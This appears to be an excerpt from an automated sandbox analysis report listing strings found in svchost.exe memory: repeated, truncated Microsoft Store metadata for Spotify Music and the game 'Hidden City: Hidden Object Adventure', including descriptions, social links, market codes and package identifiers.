Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG",